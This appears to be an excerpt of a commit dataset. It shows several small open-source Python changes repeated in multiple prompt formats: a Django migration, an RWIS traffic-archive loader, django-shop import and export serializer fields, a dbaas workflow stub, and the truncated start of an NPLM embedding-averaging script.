bsd-3-clause
|
stefantsov/blackbox3,stefantsov/blackbox3,stefantsov/blackbox3
|
Make migrations for leader_email field of Team model
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make migrations for leader_email field of Team model<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
Make migrations for leader_email field of Team model# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make migrations for leader_email field of Team model<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
|
339a25141532b0831a2fcfb621a1a7b1d6e88ac8
|
scripts/ingestors/rwis/archive_process_traffic.py
|
scripts/ingestors/rwis/archive_process_traffic.py
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
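    # '\N' is the NULL marker expected by PostgreSQL COPY (used via copy_from below).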
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
Add an archive traffic processor, yippee
|
Add an archive traffic processor, yippee
|
Python
|
mit
|
akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem
|
Add an archive traffic processor, yippee
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb

RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()


def clean(v):
    if v.strip() == '':
        return '\N'
    return v


def dofile(fp):
    """
    Actually process a file please
    """
    ts0 = None
    o = StringIO.StringIO()
    for line in open(fp):
        if line.strip() == "":
            continue
        tokens = line.replace('%','').replace(' ','').split(",")
        id = int(tokens[0]) - 512000
        nwsli = mesonet.RWISconvert['%02i' % (id,)]
        sensor_id = tokens[1]
        lane_id = tokens[2]
        ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
        if ts0 is None:
            ts0 = ts
        sped = clean( tokens[4] )
        vol = clean( tokens[5] )
        norm_vol = clean( tokens[6] )
        long_vol = clean( tokens[7] )
        headway = clean( tokens[8] )
        occupancy = clean( tokens[9] )
        o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
            ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
            norm_vol, long_vol, occupancy) )
    o.seek(0)
    if ts0 is None:
        return
    # Now we delete old obs
    rcursor.execute("""
    DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
    valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
    """ % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
           ts0.strftime('%Y-%m-01')))
    rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
    RWIS.commit()
    del o


def process_folder():
    """
    Do the necessary work to process the files in a folder
    """
    os.chdir('process')
    for file in glob.glob("export*traffic*.csv"):
        dofile( file )


if __name__ == '__main__':
    process_folder()
    RWIS.close()
|
<commit_before><commit_msg>Add an archive traffic processor, yippee<commit_after>
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb

RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()


def clean(v):
    if v.strip() == '':
        return '\N'
    return v


def dofile(fp):
    """
    Actually process a file please
    """
    ts0 = None
    o = StringIO.StringIO()
    for line in open(fp):
        if line.strip() == "":
            continue
        tokens = line.replace('%','').replace(' ','').split(",")
        id = int(tokens[0]) - 512000
        nwsli = mesonet.RWISconvert['%02i' % (id,)]
        sensor_id = tokens[1]
        lane_id = tokens[2]
        ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
        if ts0 is None:
            ts0 = ts
        sped = clean( tokens[4] )
        vol = clean( tokens[5] )
        norm_vol = clean( tokens[6] )
        long_vol = clean( tokens[7] )
        headway = clean( tokens[8] )
        occupancy = clean( tokens[9] )
        o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
            ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
            norm_vol, long_vol, occupancy) )
    o.seek(0)
    if ts0 is None:
        return
    # Now we delete old obs
    rcursor.execute("""
    DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
    valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
    """ % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
           ts0.strftime('%Y-%m-01')))
    rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
    RWIS.commit()
    del o


def process_folder():
    """
    Do the necessary work to process the files in a folder
    """
    os.chdir('process')
    for file in glob.glob("export*traffic*.csv"):
        dofile( file )


if __name__ == '__main__':
    process_folder()
    RWIS.close()
|
Add an archive traffic processor, yippee
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb

RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()


def clean(v):
    if v.strip() == '':
        return '\N'
    return v


def dofile(fp):
    """
    Actually process a file please
    """
    ts0 = None
    o = StringIO.StringIO()
    for line in open(fp):
        if line.strip() == "":
            continue
        tokens = line.replace('%','').replace(' ','').split(",")
        id = int(tokens[0]) - 512000
        nwsli = mesonet.RWISconvert['%02i' % (id,)]
        sensor_id = tokens[1]
        lane_id = tokens[2]
        ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
        if ts0 is None:
            ts0 = ts
        sped = clean( tokens[4] )
        vol = clean( tokens[5] )
        norm_vol = clean( tokens[6] )
        long_vol = clean( tokens[7] )
        headway = clean( tokens[8] )
        occupancy = clean( tokens[9] )
        o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
            ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
            norm_vol, long_vol, occupancy) )
    o.seek(0)
    if ts0 is None:
        return
    # Now we delete old obs
    rcursor.execute("""
    DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
    valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
    """ % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
           ts0.strftime('%Y-%m-01')))
    rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
    RWIS.commit()
    del o


def process_folder():
    """
    Do the necessary work to process the files in a folder
    """
    os.chdir('process')
    for file in glob.glob("export*traffic*.csv"):
        dofile( file )


if __name__ == '__main__':
    process_folder()
    RWIS.close()
|
<commit_before><commit_msg>Add an archive traffic processor, yippee<commit_after>
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb

RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()


def clean(v):
    if v.strip() == '':
        return '\N'
    return v


def dofile(fp):
    """
    Actually process a file please
    """
    ts0 = None
    o = StringIO.StringIO()
    for line in open(fp):
        if line.strip() == "":
            continue
        tokens = line.replace('%','').replace(' ','').split(",")
        id = int(tokens[0]) - 512000
        nwsli = mesonet.RWISconvert['%02i' % (id,)]
        sensor_id = tokens[1]
        lane_id = tokens[2]
        ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
        if ts0 is None:
            ts0 = ts
        sped = clean( tokens[4] )
        vol = clean( tokens[5] )
        norm_vol = clean( tokens[6] )
        long_vol = clean( tokens[7] )
        headway = clean( tokens[8] )
        occupancy = clean( tokens[9] )
        o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
            ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
            norm_vol, long_vol, occupancy) )
    o.seek(0)
    if ts0 is None:
        return
    # Now we delete old obs
    rcursor.execute("""
    DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
    valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
    """ % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
           ts0.strftime('%Y-%m-01')))
    rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
    RWIS.commit()
    del o


def process_folder():
    """
    Do the necessary work to process the files in a folder
    """
    os.chdir('process')
    for file in glob.glob("export*traffic*.csv"):
        dofile( file )


if __name__ == '__main__':
    process_folder()
    RWIS.close()
|
|
dc181cd45adba6433c2422b9550e398c6385bca5
|
shop/serializers/catalog.py
|
shop/serializers/catalog.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers


class CMSPagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductPage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        cms_pages = CMSPagesField()
        ...
    """
    def to_representation(self, value):
        urls = {page.get_absolute_url() for page in value.all()}
        return list(urls)

    def to_internal_value(self, data):
        site = get_current_site()
        pages_root = reverse('pages-root')
        ret = []
        for path in data:
            if path.startswith(pages_root):
                path = path[len(pages_root):]
            # strip any final slash
            if path.endswith('/'):
                path = path[:-1]
            page = get_page_from_path(site, path)
            if page:
                ret.append(page)
        return ret


class ImagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductImage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        images = ImagesField()
        ...
    """
    def to_representation(self, value):
        return list(value.values_list('pk', flat=True))

    def to_internal_value(self, data):
        return list(Image.objects.filter(pk__in=data))


class ValueRelatedField(serializers.RelatedField):
    """
    A serializer field used to access a single value from a related model.

    Usage:

    myfield = ValueRelatedField(model=MyModel)
    myfield = ValueRelatedField(model=MyModel, field_name='myfield')

    This serializes objects of type ``MyModel`` so that the return data is a simple scalar.
    On deserialization it creates an object of type ``MyModel``, if none could be found with the
    given field name.
    """
    def __init__(self, *args, **kwargs):
        self.model = kwargs.pop('model')
        self.related_field_name = kwargs.pop('field_name', 'name')
        super(ValueRelatedField, self).__init__(*args, **kwargs)

    def get_queryset(self):
        return self.model.objects.all()

    def to_representation(self, value):
        return getattr(value, self.related_field_name)

    def to_internal_value(self, value):
        data = {self.related_field_name: value}
        instance, _ = self.model.objects.get_or_create(**data)
        return instance
|
Create M2M serializers for export/import of products
|
Create M2M serializers for export/import of products
|
Python
|
bsd-3-clause
|
awesto/django-shop,divio/django-shop,divio/django-shop,awesto/django-shop,awesto/django-shop,divio/django-shop
|
Create M2M serializers for export/import of products
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers


class CMSPagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductPage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        cms_pages = CMSPagesField()
        ...
    """
    def to_representation(self, value):
        urls = {page.get_absolute_url() for page in value.all()}
        return list(urls)

    def to_internal_value(self, data):
        site = get_current_site()
        pages_root = reverse('pages-root')
        ret = []
        for path in data:
            if path.startswith(pages_root):
                path = path[len(pages_root):]
            # strip any final slash
            if path.endswith('/'):
                path = path[:-1]
            page = get_page_from_path(site, path)
            if page:
                ret.append(page)
        return ret


class ImagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductImage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        images = ImagesField()
        ...
    """
    def to_representation(self, value):
        return list(value.values_list('pk', flat=True))

    def to_internal_value(self, data):
        return list(Image.objects.filter(pk__in=data))


class ValueRelatedField(serializers.RelatedField):
    """
    A serializer field used to access a single value from a related model.

    Usage:

    myfield = ValueRelatedField(model=MyModel)
    myfield = ValueRelatedField(model=MyModel, field_name='myfield')

    This serializes objects of type ``MyModel`` so that the return data is a simple scalar.
    On deserialization it creates an object of type ``MyModel``, if none could be found with the
    given field name.
    """
    def __init__(self, *args, **kwargs):
        self.model = kwargs.pop('model')
        self.related_field_name = kwargs.pop('field_name', 'name')
        super(ValueRelatedField, self).__init__(*args, **kwargs)

    def get_queryset(self):
        return self.model.objects.all()

    def to_representation(self, value):
        return getattr(value, self.related_field_name)

    def to_internal_value(self, value):
        data = {self.related_field_name: value}
        instance, _ = self.model.objects.get_or_create(**data)
        return instance
|
<commit_before><commit_msg>Create M2M serializers for export/import of products<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers


class CMSPagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductPage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        cms_pages = CMSPagesField()
        ...
    """
    def to_representation(self, value):
        urls = {page.get_absolute_url() for page in value.all()}
        return list(urls)

    def to_internal_value(self, data):
        site = get_current_site()
        pages_root = reverse('pages-root')
        ret = []
        for path in data:
            if path.startswith(pages_root):
                path = path[len(pages_root):]
            # strip any final slash
            if path.endswith('/'):
                path = path[:-1]
            page = get_page_from_path(site, path)
            if page:
                ret.append(page)
        return ret


class ImagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductImage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        images = ImagesField()
        ...
    """
    def to_representation(self, value):
        return list(value.values_list('pk', flat=True))

    def to_internal_value(self, data):
        return list(Image.objects.filter(pk__in=data))


class ValueRelatedField(serializers.RelatedField):
    """
    A serializer field used to access a single value from a related model.

    Usage:

    myfield = ValueRelatedField(model=MyModel)
    myfield = ValueRelatedField(model=MyModel, field_name='myfield')

    This serializes objects of type ``MyModel`` so that the return data is a simple scalar.
    On deserialization it creates an object of type ``MyModel``, if none could be found with the
    given field name.
    """
    def __init__(self, *args, **kwargs):
        self.model = kwargs.pop('model')
        self.related_field_name = kwargs.pop('field_name', 'name')
        super(ValueRelatedField, self).__init__(*args, **kwargs)

    def get_queryset(self):
        return self.model.objects.all()

    def to_representation(self, value):
        return getattr(value, self.related_field_name)

    def to_internal_value(self, value):
        data = {self.related_field_name: value}
        instance, _ = self.model.objects.get_or_create(**data)
        return instance
|
Create M2M serializers for export/import of products
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers


class CMSPagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductPage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        cms_pages = CMSPagesField()
        ...
    """
    def to_representation(self, value):
        urls = {page.get_absolute_url() for page in value.all()}
        return list(urls)

    def to_internal_value(self, data):
        site = get_current_site()
        pages_root = reverse('pages-root')
        ret = []
        for path in data:
            if path.startswith(pages_root):
                path = path[len(pages_root):]
            # strip any final slash
            if path.endswith('/'):
                path = path[:-1]
            page = get_page_from_path(site, path)
            if page:
                ret.append(page)
        return ret


class ImagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductImage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        images = ImagesField()
        ...
    """
    def to_representation(self, value):
        return list(value.values_list('pk', flat=True))

    def to_internal_value(self, data):
        return list(Image.objects.filter(pk__in=data))


class ValueRelatedField(serializers.RelatedField):
    """
    A serializer field used to access a single value from a related model.

    Usage:

    myfield = ValueRelatedField(model=MyModel)
    myfield = ValueRelatedField(model=MyModel, field_name='myfield')

    This serializes objects of type ``MyModel`` so that the return data is a simple scalar.
    On deserialization it creates an object of type ``MyModel``, if none could be found with the
    given field name.
    """
    def __init__(self, *args, **kwargs):
        self.model = kwargs.pop('model')
        self.related_field_name = kwargs.pop('field_name', 'name')
        super(ValueRelatedField, self).__init__(*args, **kwargs)

    def get_queryset(self):
        return self.model.objects.all()

    def to_representation(self, value):
        return getattr(value, self.related_field_name)

    def to_internal_value(self, value):
        data = {self.related_field_name: value}
        instance, _ = self.model.objects.get_or_create(**data)
        return instance
|
<commit_before><commit_msg>Create M2M serializers for export/import of products<commit_after>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers


class CMSPagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductPage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        cms_pages = CMSPagesField()
        ...
    """
    def to_representation(self, value):
        urls = {page.get_absolute_url() for page in value.all()}
        return list(urls)

    def to_internal_value(self, data):
        site = get_current_site()
        pages_root = reverse('pages-root')
        ret = []
        for path in data:
            if path.startswith(pages_root):
                path = path[len(pages_root):]
            # strip any final slash
            if path.endswith('/'):
                path = path[:-1]
            page = get_page_from_path(site, path)
            if page:
                ret.append(page)
        return ret


class ImagesField(serializers.Field):
    """
    A serializer field used to create the many-to-many relations for models inheriting from the
    unmanaged :class:`shop.models.related.BaseProductImage`.

    Usage in serializers to import/export product model data:

    class MyProductSerializer():
        ...
        images = ImagesField()
        ...
    """
    def to_representation(self, value):
        return list(value.values_list('pk', flat=True))

    def to_internal_value(self, data):
        return list(Image.objects.filter(pk__in=data))


class ValueRelatedField(serializers.RelatedField):
    """
    A serializer field used to access a single value from a related model.

    Usage:

    myfield = ValueRelatedField(model=MyModel)
    myfield = ValueRelatedField(model=MyModel, field_name='myfield')

    This serializes objects of type ``MyModel`` so that the return data is a simple scalar.
    On deserialization it creates an object of type ``MyModel``, if none could be found with the
    given field name.
    """
    def __init__(self, *args, **kwargs):
        self.model = kwargs.pop('model')
        self.related_field_name = kwargs.pop('field_name', 'name')
        super(ValueRelatedField, self).__init__(*args, **kwargs)

    def get_queryset(self):
        return self.model.objects.all()

    def to_representation(self, value):
        return getattr(value, self.related_field_name)

    def to_internal_value(self, value):
        data = {self.related_field_name: value}
        instance, _ = self.model.objects.get_or_create(**data)
        return instance
|
|
0c69ade79a3e83024c69698a0cb3eae775d8082d
|
dbaas/workflow/steps/util/region_migration/check_instances_status.py
|
dbaas/workflow/steps/util/region_migration/check_instances_status.py
|
# -*- coding: utf-8 -*-
import logging

from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020

LOG = logging.getLogger(__name__)


class DecreaseTTL(BaseStep):

    def __unicode__(self):
        return "Checking instances status..."

    def do(self, workflow_dict):
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False

    def undo(self, workflow_dict):
        LOG.info("Running undo...")
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
|
Remove unused imports and change exception handling
|
Remove unused imports and change exception handling
|
Python
|
bsd-3-clause
|
globocom/database-as-a-service,globocom/database-as-a-service,globocom/database-as-a-service,globocom/database-as-a-service
|
Remove unused imports and change exception handling
|
# -*- coding: utf-8 -*-
import logging

from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020

LOG = logging.getLogger(__name__)


class DecreaseTTL(BaseStep):

    def __unicode__(self):
        return "Checking instances status..."

    def do(self, workflow_dict):
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False

    def undo(self, workflow_dict):
        LOG.info("Running undo...")
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
|
<commit_before><commit_msg>Remove unused imports and change exception handling<commit_after>
|
# -*- coding: utf-8 -*-
import logging

from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020

LOG = logging.getLogger(__name__)


class DecreaseTTL(BaseStep):

    def __unicode__(self):
        return "Checking instances status..."

    def do(self, workflow_dict):
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False

    def undo(self, workflow_dict):
        LOG.info("Running undo...")
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
|
Remove unused imports and change exception handling
# -*- coding: utf-8 -*-
import logging

from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020

LOG = logging.getLogger(__name__)


class DecreaseTTL(BaseStep):

    def __unicode__(self):
        return "Checking instances status..."

    def do(self, workflow_dict):
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False

    def undo(self, workflow_dict):
        LOG.info("Running undo...")
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
|
<commit_before><commit_msg>Remove unused imports and change exception handling<commit_after>
# -*- coding: utf-8 -*-
import logging

from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020

LOG = logging.getLogger(__name__)


class DecreaseTTL(BaseStep):

    def __unicode__(self):
        return "Checking instances status..."

    def do(self, workflow_dict):
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False

    def undo(self, workflow_dict):
        LOG.info("Running undo...")
        try:
            return True
        except Exception:
            traceback = full_stack()
            workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
            workflow_dict['exceptions']['traceback'].append(traceback)
            return False
|
|
0451142ecede6f899b97b28114843413332e3f0b
|
scripts/nplm-training/averageNullEmbedding_baseline.py
|
scripts/nplm-training/averageNullEmbedding_baseline.py
|
#!/usr/bin/env python2
import sys
import numpy
import optparse

#sys.path.append('/data/tools/nplm/python')

parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
    nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
    null_idx = 1
)
options,_ = parser.parse_args(sys.argv)

sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict


def load_model(model_file):
    return nplm.NeuralLM.from_file(model_file)


def get_weights(path, length):
    d = [0]*length
    for line in open(path):
        last_context = int(line.split()[-2])
        d[last_context] += 1
    return d


if __name__ == "__main__":
    a = load_model(options.input_model)
    print 'before:'
    print a.input_embeddings[options.null_idx]
    weights = numpy.array(get_weights(options.training_ngrams, len(a.input_embeddings)))
    a.input_embeddings[options.null_idx] = numpy.average(numpy.array(a.input_embeddings), weights=weights, axis=0)
    print 'after:'
    print a.input_embeddings[options.null_idx]
    a.to_file(open(options.output_model,'w'))
|
Add null token normalization for models to be used with the chart decoder.
|
Add null token normalization for models to be used with the chart decoder.
|
Python
|
lgpl-2.1
|
alvations/mosesdecoder,emjotde/mosesdecoder_nmt,moses-smt/mosesdecoder,alvations/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,KonceptGeek/mosesdecoder,hychyc07/mosesdecoder,KonceptGeek/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,pjwilliams/mosesdecoder,hychyc07/mosesdecoder,alvations/mosesdecoder,emjotde/mosesdecoder_nmt,KonceptGeek/mosesdecoder,tofula/mosesdecoder,moses-smt/mosesdecoder,KonceptGeek/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,alvations/mosesdecoder,KonceptGeek/mosesdecoder,hychyc07/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,emjotde/mosesdecoder_nmt,moses-smt/mosesdecoder,tofula/mosesdecoder,tofula/mosesdecoder,hychyc07/mosesdecoder,tofula/mosesdecoder,moses-smt/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,KonceptGeek/mosesdecoder,emjotde/mosesdecoder_nmt,hychyc07/mosesdecoder,hychyc07/mosesdecoder,tofula/mosesdecoder,hychyc07/mosesdecoder,alvations/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,pjwilliams/mosesdecoder,moses-smt/mosesdecoder,alvations/mosesdecoder,hychyc07/mosesdecoder,moses-smt/mosesdecoder,hychyc07/mosesdecoder,KonceptGeek/mosesdecoder,alvations/mosesdecoder,KonceptGeek/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,moses-smt/mosesdecoder,emjotde/mosesdecoder_nmt,emjotde/mosesdecoder_nmt,alvations/mosesdecoder,hychyc07/mosesdecoder,pjwilliams/mosesdecoder,pjwilliams/mosesdecoder,tofula/mosesdecoder,emjotde/mosesdecoder_nmt,pjwilliams/mosesdecoder,emjotde/mosesdecoder_nmt
|
Add null token normalization for models to be used with the chart decoder.
|
#!/usr/bin/env python2
import sys
import numpy
import optparse

#sys.path.append('/data/tools/nplm/python')

parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
parser.add_option("-n", "--null-token-index", type="int", dest="null_idx")
parser.add_option("-t", "--training-ngrams", type="string", dest="training_ngrams")
parser.set_defaults(
    nplm_python_path = '/mnt/gna0/rsennrich/tools/nplm/python',
    null_idx = 1
)
options,_ = parser.parse_args(sys.argv)

sys.path.append(options.nplm_python_path)
import nplm
from collections import defaultdict


def load_model(model_file):
